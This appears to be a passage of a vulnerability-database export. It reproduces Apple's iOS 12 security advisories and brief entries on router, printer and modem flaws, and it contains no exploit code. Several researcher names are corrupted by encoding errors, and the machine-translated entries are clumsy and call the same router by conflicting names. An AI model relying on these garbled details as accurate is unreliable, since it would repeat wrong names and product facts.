8L9ZM/dj8BC+m713LeC/KzveaDpaqnVJUDbgUkzRyFfFqOJt+hlaTS8yMUM3G+TX
cblL8bvFNIxtUrt4Rf2TwDRVxUZIw/aFK2APmxVZ44UAT+2o+WFxBkHRXQiZc4Lk
OaTzzkocdZu4q4MibrxELBWtW46AcGMqQKUpFZ6GR+4U2c1ICRwKnjQTn0iY7mg7
d+M+bTx8T2knwV7lSwvnHz79rysvOuCF3QCAZ4tW4PvLHWSZ0TpJho8z23PLHFQd
J3cOYPby6SM9YP6SBISX5OI8xnvr1XIAPIBnOy0ScaMFsu0Er8j1hvbF1fXiaYOJ
CSUUXR2th3jPW0g9L0j4vWGURG1h0psIN2MxTSHbmm4KXBAYngZ0wDOeJMUe8YMy
IG0UBDqKNh8lzKHcc4aYA1WyaNsqbgbngBqDATp/XyWRzd+Py/U06MVuIaV095Rv
s9WW67M1kLHy4BeutXt+xLBp9AugI+gU53uysxcnBx4=
=dGPm
-----END PGP SIGNATURE-----
| VAR-201904-1405 | CVE-2018-4313 | plural Apple Product application snapshot processing inconsistency vulnerability |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
A consistency issue existed in the handling of application snapshots. The issue was addressed with improved handling of message deletions. This issue affected versions prior to iOS 12, tvOS 12, watchOS 5. iOS , tvOS , watchOS The application's snapshot process is flawed in its message deletion process, which results in an inconsistent vulnerability.Information may be obtained. Apple iOS, etc. are all products of Apple (Apple). Apple iOS is an operating system developed for mobile devices. Apple tvOS is a smart TV operating system. tvOS is a smart TV operating system. A local attacker could exploit this vulnerability to discover messages that a user has deleted and websites that a user has visited.
Alternatively, on your watch, select "My Watch > General > About". -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2018-10-30-8 Additional information for
APPLE-SA-2018-9-24-4 iOS 12
iOS 12 addresses the following:
Accounts
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local app may be able to read a persistent account
identifier
Description: This issue was addressed with improved entitlements.
CVE-2018-4322: Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc.
Auto Unlock
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to access local users
AppleIDs
Description: A validation issue existed in the entitlement
verification.
CVE-2018-4321: Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc.
Bluetooth
Available for: iPhone SE, iPhone 6s, iPhone 6s Plus, iPhone 7,
iPhone 7 Plus, iPad Mini 4, 12.9-inch iPad Pro 1st generation,
12.9-inch iPad Pro 2nd generation, 10.5-inch iPad Pro,
9.7-inch iPad Pro, iPad 5th generation, and iPod Touch 6th generation
Impact: An attacker in a privileged network position may be able to
intercept Bluetooth traffic
Description: An input validation issue existed in Bluetooth.
CVE-2018-5383: Lior Neumann and Eli Biham
CFNetwork
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4126: Bruno Keith (@bkth_) working with Trend Micro's Zero
Day Initiative
Entry added October 30, 2018
CoreFoundation
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to elevate privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2018-4412: The UK's National Cyber Security Centre (NCSC)
Entry added October 30, 2018
CoreFoundation
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to gain elevated privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2018-4414: The UK's National Cyber Security Centre (NCSC)
Entry added October 30, 2018
CoreMedia
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An app may be able to learn information about the current
camera view before being granted camera access
Description: A permissions issue existed.
CVE-2018-4356: an anonymous researcher
CoreText
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing a maliciously crafted text file may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2018-4347: an anonymous researcher
Entry added October 30, 2018
Crash Reporter
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with improved input
sanitization.
CVE-2018-4333: Brandon Azad
Grand Central Dispatch
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4426: Brandon Azad
Entry added October 30, 2018
Heimdal
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4331: Brandon Azad
CVE-2018-4332: Brandon Azad
CVE-2018-4343: Brandon Azad
Entry added October 30, 2018
iBooks
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Parsing a maliciously crafted iBooks file may lead to
disclosure of user information
Description: A configuration issue was addressed with additional
restrictions.
CVE-2018-4355: evi1m0 of bilibili security team
Entry added October 30, 2018
IOHIDFamily
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A memory corruption issue was addressed with improved
input validation
CVE-2018-4408: Ian Beer of Google Project Zero
Entry added October 30, 2018
IOKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to break out of its
sandbox
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4341: Ian Beer of Google Project Zero
CVE-2018-4354: Ian Beer of Google Project Zero
Entry added October 30, 2018
IOKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
state management.
CVE-2018-4383: Apple
Entry added October 30, 2018
IOMobileFrameBuffer
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with improved input
sanitization.
CVE-2018-4335: Brandon Azad
IOUserEthernet
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4401: Apple
Entry added October 30, 2018
iTunes Store
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An attacker in a privileged network position may be able to
spoof password prompts in the iTunes Store
Description: An input validation issue was addressed with improved
input validation.
CVE-2018-4305: Jerry Decime
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to leak sensitive user
information
Description: An access issue existed with privileged API calls.
CVE-2018-4399: Fabiano Anemone (@anoane)
Entry added October 30, 2018
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: An input validation issue existed in the kernel.
CVE-2018-4363: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An attacker in a privileged network position may be able to
execute arbitrary code
Description: A memory corruption issue was addressed with improved
validation.
CVE-2018-4407: Kevin Backhouse of Semmle Ltd.
Entry added October 30, 2018
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4336: Brandon Azad
CVE-2018-4337: Ian Beer of Google Project Zero
CVE-2018-4340: Mohamed Ghannam (@_simo36)
CVE-2018-4344: The UK's National Cyber Security Centre (NCSC)
CVE-2018-4425: cc working with Trend Micro's Zero Day Initiative,
Juwei Lin (@panicaII) of Trend Micro working with Trend Micro's Zero
Day Initiative
Entry added October 30, 2018
mDNSOffloadUserClient
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4326: an anonymous researcher working with Trend Micro's
Zero Day Initiative, Zhuo Liang of Qihoo 360 Nirvan Team
Entry added October 30, 2018
MediaRemote
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A sandboxed process may be able to circumvent sandbox
restrictions
Description: An access issue was addressed with additional sandbox
restrictions.
CVE-2018-4310: CodeColorist of Ant-Financial LightYear Labs
Entry added October 30, 2018
Messages
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to discover a user's deleted
messages
Description: A consistency issue existed in the handling of
application snapshots.
CVE-2018-4313: 11 anonymous researchers, David Scott, Enes Mert
Ulu of Abdullah MA1/4rAide AzA1/4nenek Anadolu Lisesi -
Ankara/TA1/4rkiye, Mehmet Ferit DaAtan of Van YA1/4zA1/4ncA1/4 YA+-l
University, Metin Altug Karakaya of Kaliptus Medical Organization,
Vinodh Swami of Western Governor's University (WGU)
Notes
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to discover a user's deleted notes
Description: A consistency issue existed in the handling of
application snapshots.
CVE-2018-4352: Utku Altinkaynak
Safari
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to discover websites a user has
visited
Description: A consistency issue existed in the handling of
application snapshots.
CVE-2018-4313: 11 anonymous researchers, David Scott, Enes Mert
Ulu of Abdullah MA1/4rAide AzA1/4nenek Anadolu Lisesi -
Ankara/TA1/4rkiye, Mehmet Ferit DaAtan of Van YA1/4zA1/4ncA1/4 YA+-l
University, Metin Altug Karakaya of Kaliptus Medical Organization,
Vinodh Swami of Western Governor's University (WGU)
Safari
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A user may be unable to delete browsing history items
Description: Clearing a history item may not clear visits with
redirect chains.
CVE-2018-4329: Hugo S. Diaz (coldpointblue)
SafariViewController
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Visiting a malicious website may lead to address bar spoofing
Description: An inconsistent user interface issue was addressed with
improved state management.
CVE-2018-4362: Jun Kokatsu (@shhnjk)
Security
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may be able to exfiltrate autofilled data
in Safari
Description: A logic issue was addressed with improved state
management.
CVE-2018-4307: Rafay Baloch of Pakistan Telecommunications Authority
Security
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to cause a denial of service
Description: This issue was addressed with improved checks.
CVE-2018-4395: Patrick Wardle of Digita Security
Entry added October 30, 2018
Security
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An attacker may be able to exploit weaknesses in the RC4
cryptographic algorithm
Description: This issue was addressed by removing RC4.
CVE-2016-1777: Pepi Zawodsky
Status Bar
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A person with physical access to an iOS device may be able to
determine the last used app from the lock screen
Description: A logic issue was addressed with improved restrictions.
CVE-2018-4325: Brian Adeloye
Symptom Framework
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2018-4203: Bruno Keith (@bkth_) working with Trend Micro's Zero
Day Initiative
Entry added October 30, 2018
Text
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing a maliciously crafted text file may lead to a
denial of service
Description: A denial of service issue was addressed with improved
validation.
CVE-2018-4304: jianan.huang (@Sevck)
Entry added October 30, 2018
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2018-4316: crixer, Hanming Zhang (@4shitak4) of Qihoo 360 Vulcan
Team
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2018-4299: Samuel GroI2 (saelo) working with Trend Micro's Zero
Day Initiative
CVE-2018-4323: Ivan Fratric of Google Project Zero
CVE-2018-4328: Ivan Fratric of Google Project Zero
CVE-2018-4358: @phoenhex team (@bkth_ @5aelo @_niklasb) working with
Trend Micro's Zero Day Initiative
CVE-2018-4359: Samuel GroA (@5aelo)
CVE-2018-4360: William Bowling (@wcbowling)
Entry added October 30, 2018
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may cause unexepected cross-origin
behavior
Description: A cross-origin issue existed with "iframe" elements.
CVE-2018-4319: John Pettitt of Google
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2018-4197: Ivan Fratric of Google Project Zero
CVE-2018-4306: Ivan Fratric of Google Project Zero
CVE-2018-4312: Ivan Fratric of Google Project Zero
CVE-2018-4314: Ivan Fratric of Google Project Zero
CVE-2018-4315: Ivan Fratric of Google Project Zero
CVE-2018-4317: Ivan Fratric of Google Project Zero
CVE-2018-4318: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may exfiltrate image data cross-origin
Description: A cross-site scripting issue existed in Safari.
CVE-2018-4345: an anonymous researcher
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Unexpected interaction causes an ASSERT failure
Description: A memory corruption issue was addressed with improved
validation.
CVE-2018-4191: found by OSS-Fuzz
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Cross-origin SecurityErrors includes the accessed frame's
origin
Description: The issue was addressed by removing origin information.
CVE-2018-4311: Erling Alf Ellingsen (@steike)
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may be able to execute scripts in the
context of another website
Description: A cross-site scripting issue existed in Safari.
CVE-2018-4309: an anonymous researcher working with Trend Micro's
Zero Day Initiative
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Unexpected interaction causes an ASSERT failure
Description: A memory consumption issue was addressed with improved
memory handling.
CVE-2018-4361: found by OSS-Fuzz
Additional recognition
APFS
We would like to acknowledge Umang Raghuvanshi for their assistance.
Assets
We would like to acknowledge Brandon Azad for their assistance.
configd
We would like to acknowledge Sabri Haddouche (@pwnsdx) of Wire Swiss
GmbH for their assistance.
Core Data
We would like to acknowledge Andreas Kurtz (@aykay) of NESO Security
Labs GmbH for their assistance.
CoreSymbolication
We would like to acknowledge Brandon Azad for their assistance.
Exchange ActiveSync
We would like to acknowledge Jesse Thompson of University of
Wisconsin-Madison for their assistance.
Feedback Assistant
We would like to acknowledge Marco Grassi (@marcograss) of KeenLab
(@keen_lab) Tencent working with Trend Micro's Zero Day Initiative
for their assistance.
Kernel
We would like to acknowledge Brandon Azad for their assistance.
Mail
We would like to acknowledge Alessandro Avagliano of Rocket Internet
SE, Gunnar Diepenbruck,
and Zbyszek A>>A3Akiewski for their assistance.
MediaRemote
We would like to acknowledge Brandon Azad for their assistance.
Quick Look
We would like to acknowledge lokihardt of Google Project Zero for
their assistance.
Safari
We would like to acknowledge Marcel Manz of SIMM-Comm GmbH and Vlad
Galbin for their assistance.
Sandbox Profiles
We would like to acknowledge Tencent Keen Security Lab working with
Trend Micro's Zero Day Initiative for their assistance.
Security
We would like to acknowledge Christoph Sinai, Daniel Dudek
(@dannysapples) of The Irish Times and Filip KlubiAka (@lemoncloak)
of ADAPT Centre, Dublin Institute of Technology, Istvan Csanady of
Shapr3D, Omar Barkawi of ITG Software, Inc., Phil Caleno, Wilson
Ding, and an anonymous researcher for their assistance.
SQLite
We would like to acknowledge Andreas Kurtz (@aykay) of NESO Security
Labs GmbH for their assistance.
Status Bar
We would like to acknowledge Ju Zhu of Meituan and Moony Li and
Lilang Wu of Trend Micro for their assistance.
WebKit
We would like to acknowledge Cary Hartline, Hanming Zhang from 360
Vuclan team, Tencent Keen Security Lab working with Trend Micro's
Zero Day Initiative, and Zach Malone of CA Technologies for their
assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About.
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlvYkgYpHHByb2R1Y3Qt
c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3HbuA//
ZOEwXUyLVS3SqfEjU3MRUoTp1x+Ow+fd5co9B6v7bY+Ebc2KmSZjpPuNPjouRHmf
RbWpZ0Mc52NYm+OdYqPu/Tg94wRi6tlrYusk6GngVH4IBER4TqiFrLNSzAjXL0xP
qWv3JQcAIFNbNWpSEzDzEbuq85q4BIuP/+v2LpTc1ZWqIYt9TQHxUpyjoTXZvQhL
8L9ZM/dj8BC+m713LeC/KzveaDpaqnVJUDbgUkzRyFfFqOJt+hlaTS8yMUM3G+TX
cblL8bvFNIxtUrt4Rf2TwDRVxUZIw/aFK2APmxVZ44UAT+2o+WFxBkHRXQiZc4Lk
OaTzzkocdZu4q4MibrxELBWtW46AcGMqQKUpFZ6GR+4U2c1ICRwKnjQTn0iY7mg7
d+M+bTx8T2knwV7lSwvnHz79rysvOuCF3QCAZ4tW4PvLHWSZ0TpJho8z23PLHFQd
J3cOYPby6SM9YP6SBISX5OI8xnvr1XIAPIBnOy0ScaMFsu0Er8j1hvbF1fXiaYOJ
CSUUXR2th3jPW0g9L0j4vWGURG1h0psIN2MxTSHbmm4KXBAYngZ0wDOeJMUe8YMy
IG0UBDqKNh8lzKHcc4aYA1WyaNsqbgbngBqDATp/XyWRzd+Py/U06MVuIaV095Rv
s9WW67M1kLHy4BeutXt+xLBp9AugI+gU53uysxcnBx4=
=dGPm
-----END PGP SIGNATURE-----
| VAR-201901-1590 | CVE-2018-4330 | iOS Memory corruption vulnerability |
CVSS V2: 9.3 CVSS V3: 7.8 Severity: HIGH |
In iOS before 11.4, a memory corruption issue exists and was addressed with improved memory handling. Apple iOS is prone to multiple security vulnerabilities.
Attackers can exploit these issues to gain sensitive information, bypass security mechanisms, and conduct spoofing attacks and perform unauthorized actions.
Versions prior to Apple iOS 12 are vulnerable. Core Bluetooth is one of the core Bluetooth components. An attacker could exploit this vulnerability to execute arbitrary code with system privileges (memory corruption). -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2018-9-17-1 iOS 12
iOS 12 is now available and addresses the following:
Accounts
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local app may be able to read a persistent account
identifier
Description: This issue was addressed with improved entitlements.
CVE-2018-4322: Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc.
Bluetooth
Available for: iPhone SE, iPhone 6s, iPhone 6s Plus, iPhone 7,
iPhone 7 Plus, iPad Mini 4, 12.9-inch iPad Pro 1st generation,
12.9-inch iPad Pro 2nd generation, 10.5-inch iPad Pro,
9.7-inch iPad Pro, iPad 5th generation, and iPod Touch 6th generation
Impact: An attacker in a privileged network position may be able to
intercept Bluetooth traffic
Description: An input validation issue existed in Bluetooth.
CVE-2018-5383: Lior Neumann and Eli Biham
Core Bluetooth
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4330: Apple
CoreMedia
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An app may be able to learn information about the current
camera view before being granted camera access
Description: A permissions issue existed. This issue was addressed
with improved permission validation.
CVE-2018-4356: an anonymous researcher
IOMobileFrameBuffer
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with improved input
sanitization.
CVE-2018-4335: Brandon Azad
iTunes Store
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An attacker in a privileged network position may be able to
spoof password prompts in the iTunes Store
Description: An input validation issue was addressed with improved
input validation.
CVE-2018-4305: Jerry Decime
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: An input validation issue existed in the kernel.
CVE-2018-4363: Ian Beer of Google Project Zero
Messages
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to discover a user's deleted
messages
Description: A consistency issue existed in the handling of
application snapshots.
CVE-2018-4313: 11 anonymous researchers, David Scott,
Enes Mert Ulu of Abdullah MA1/4rAide AzA1/4nenek Anadolu Lisesi -
Ankara/TA1/4rkiye, Mehmet Ferit DaAtan of Van YA1/4zA1/4ncA1/4 YA+-l
University, Metin Altug Karakaya of Kaliptus Medical Organization,
Vinodh Swami of Western Governor's University (WGU)
Notes
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to discover a user's deleted notes
Description: A consistency issue existed in the handling of
application snapshots.
CVE-2018-4352: an anonymous researcher
Safari
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to discover websites a user has
visited
Description: A consistency issue existed in the handling of
application snapshots.
CVE-2018-4313: 11 anonymous researchers, David Scott,
Enes Mert Ulu of Abdullah MA1/4rAide AzA1/4nenek Anadolu Lisesi -
Ankara/TA1/4rkiye, Mehmet Ferit DaAtan of Van YA1/4zA1/4ncA1/4 YA+-l
University, Metin Altug Karakaya of Kaliptus Medical Organization,
Vinodh Swami of Western Governor's University (WGU)
Safari
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A user may be unable to delete browsing history items
Description: Clearing a history item may not clear visits with
redirect chains.
CVE-2018-4329: Hugo S. Diaz (coldpointblue)
Safari
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may be able to exfiltrate autofilled data
in Safari
Description: A logic issue was addressed with improved state
management.
CVE-2018-4307: Rafay Baloch of Pakistan Telecommunications Authority
SafariViewController
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Visiting a malicious website may lead to address bar spoofing
Description: An inconsistent user interface issue was addressed with
improved state management.
CVE-2018-4362: Jun Kokatsu (@shhnjk)
Security
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An attacker may be able to exploit weaknesses in the RC4
cryptographic algorithm
Description: This issue was addressed by removing RC4.
CVE-2016-1777: Pepi Zawodsky
Status Bar
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A person with physical access to an iOS device may be able to
determine the last used app from the lock screen
Description: A logic issue was addressed with improved restrictions.
CVE-2018-4325: Brian Adeloye
Wi-Fi
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with improved input
sanitization.
CVE-2018-4338: Lee @ SECLAB, Yonsei University working with Trend
Micro's Zero Day Initiative
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "iOS 12".
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAluf5GIACgkQeC9tht7T
K3G2mg//QBqaVSeHLeqL489OJmSvBtudWIDY1GhHJ5Xc8ox3ILDNLVZeBU+DIpqr
Fb/slmBKhNM69CPf2fGC/Af2h3ZbUYVoANoyWfH+A/PYzFV726w5WHaq4QZndauO
urHsrE/lH8CvDFS6lzp0OdGV5hVIGQ3hoYiF0lYmIdzCDQYwvFp+pn2I3b37Io8K
5/cjRiYp+uq2NAKLm6hx8yq0NtYAQyQTsk6ZAsGlilmydLJDGnaeJE80wk7EBd8f
rkdtqzs5B5ohHVYLcoGgMUrE7qyLpqwXjkfIJO8bkk1IqlbMwjmhOJVRPaHWtj5Y
8Ouc2ebMfpFimk9+ODBUYMCsQJgQw8P6pW3gfSpiheIOPc65KzoaAdg+nOfmPwJK
LR9CDMJauwYHf1I2RrMzDBflV1HIPurYciHBZKn6IH4f3KNIu5PGNTnHFgln6MxT
D11WXuxNfvc2B1hRIRHXD2OB1+rh5Q+tkb+AEauHzIFWgl7otx6EZhiu7W8Mxa22
k6s/Fo1UZI1GbnNjU9ugEumxH8w0WQNQZOOH3FI07aA7F2FVcTVXL4uaIoHzZR0N
ZmC/RvsQNGmw8L+DRWedEHda/rieAgMHkJxrjF0Day9PqY50YL7F+7qaw2J6Tmpo
r5jDothh/1TQbkE5G8oOaT3Y3iOtDcMqh0T7jRxIP7awQMKce9M=
=1Ld6
-----END PGP SIGNATURE-----
| VAR-201809-0357 | CVE-2018-17127 | ASUS GT-AC5300 In the device NULL Pointer dereference vulnerability |
CVSS V2: 7.8 CVSS V3: 7.5 Severity: HIGH |
blocking_request.cgi on ASUS GT-AC5300 devices through 3.0.0.4.384_32738 allows remote attackers to cause a denial of service (NULL pointer dereference and device crash) via a request that lacks a timestap parameter. The ASUSGT-AC5300 is a wireless router from ASUS. A security vulnerability exists in the blocking_request.cgi file in ASUSGT-AC53003.0.0.4.384_32738 and earlier
| VAR-201809-1334 | No CVE | Phiex K2 router has a command execution vulnerability at the Lanset settings page |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
The Fixon K2 (PSG1218) router is a new-generation wireless router necessary for entry-level users.
There is a loophole in the execution of the Pfeiffer K2 router in the Lanset settings page. The vulnerability is due to the failure of the back-end code to properly filter the user's input ipaddr. An attacker could use the vulnerability to execute arbitrary commands on the affected router.
| VAR-201809-1339 | No CVE | Command execution vulnerability in HP LaserJet Professional P1600 series printers |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
HP LaserJet Professional P1600 is a printer series developed by Hewlett-Packard Company.
The HP LaserJet Professional P1600 series printer has a command execution vulnerability. Attackers can use the vulnerability to execute commands to gain server permissions.
| VAR-201809-0900 | CVE-2018-14327 |
EE EE40VB 4G Vulnerabilities related to authorization, authority, and access control in mobile broadband modems
Related entries in the VARIoT exploits database: VAR-E-201809-0081 |
CVSS V2: 9.3 CVSS V3: 7.8 Severity: HIGH |
The installer for the Alcatel OSPREY3_MINI Modem component on EE EE40VB 4G mobile broadband modems with firmware before EE40_00_02.00_45 sets weak permissions (Everyone:Full Control) for the "Web Connecton\EE40" and "Web Connecton\EE40\BackgroundService" directories, which allows local users to gain privileges, as demonstrated by inserting a Trojan horse ServiceManager.exe file into the "Web Connecton\EE40\BackgroundService" directory. EE EE40VB 4G Mobile broadband modems contain vulnerabilities related to authorization, authority, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The 4GEEWiFiMini is a portable wireless router. A local elevation of privilege vulnerability exists in versions prior to 4GEEWiFiMiniEE40_00_02.00_45, which can be exploited by local attackers to gain elevated system privileges. EE 4GEE WiFi Mini is prone to a local privilege-escalation vulnerability.
Versions prior to 4GEE WiFi Mini EE40_00_02.00_45 are vulnerable
| VAR-201811-0983 | CVE-2018-7357 |
ZTE ZXHN H168N Vulnerabilities related to certificate and password management in products
Related entries in the VARIoT exploits database: VAR-E-201812-0237 |
CVSS V2: 3.3 CVSS V3: 8.8 Severity: HIGH |
ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper access control vulnerability, which may allow an unauthorized user to gain unauthorized access. ZTE ZXHN H168N The product contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ZTE ZXHN H168N is prone to an authorization-bypass vulnerability.
ZTE ZXHN H168N versions 2.2.0_PK1.2T5, 2.2.0_PK1.2T2, 2.2.0_PK11T7 and 2.2.0_PK11T are vulnerable. ZTE ZXHN H168N is a wireless VDSL router of China ZTE Corporation (ZTE). The following versions are affected: ZTE ZXHN H168N V2.2.0_PK1.2T5 version, V2.2.0_PK1.2T2 version, V2.2.0_PK11T7 version, V2.2.0_PK11T version. [*] POC: (CVE-2018-7357 and CVE-2018-7358)
